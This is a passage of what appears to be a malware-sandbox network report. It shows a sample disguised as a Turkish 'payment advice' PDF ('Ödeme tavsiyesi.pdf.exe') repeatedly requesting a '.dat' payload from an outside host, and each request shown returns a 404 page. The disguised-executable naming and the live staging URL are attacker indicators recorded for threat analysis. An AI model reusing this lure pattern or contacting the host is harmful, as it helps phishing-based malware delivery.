      2024-12-16 13:24:32 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.549707185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:33 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:34 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:34 GMT
      vary: User-Agent
      2024-12-16 13:24:34 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      4192.168.2.549708185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:36 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:36 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:36 GMT
      vary: User-Agent
      2024-12-16 13:24:36 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      5192.168.2.549709185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:38 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:38 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:38 GMT
      vary: User-Agent
      2024-12-16 13:24:38 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      6192.168.2.549710185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:39 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:40 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:40 GMT
      vary: User-Agent
      2024-12-16 13:24:40 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      7192.168.2.549711185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:41 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:42 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:42 GMT
      vary: User-Agent
      2024-12-16 13:24:42 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      8192.168.2.549713185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:43 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:44 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:44 GMT
      vary: User-Agent
      2024-12-16 13:24:44 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      9192.168.2.549716185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:45 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:46 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:46 GMT
      vary: User-Agent
      2024-12-16 13:24:46 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      10192.168.2.549718185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:47 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:48 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:48 GMT
      vary: User-Agent
      2024-12-16 13:24:48 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      11192.168.2.549725185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:49 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:50 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:49 GMT
      vary: User-Agent
      2024-12-16 13:24:50 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      12192.168.2.549731185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:51 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:52 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:52 GMT
      vary: User-Agent
      2024-12-16 13:24:52 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      13192.168.2.549737185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:53 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:54 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:53 GMT
      vary: User-Agent
      2024-12-16 13:24:54 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      14192.168.2.549743185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:55 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:55 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:55 GMT
      vary: User-Agent
      2024-12-16 13:24:55 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      15192.168.2.549744185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:57 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:57 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:57 GMT
      vary: User-Agent
      2024-12-16 13:24:57 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      16192.168.2.549750185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:24:59 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:24:59 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:24:59 GMT
      vary: User-Agent
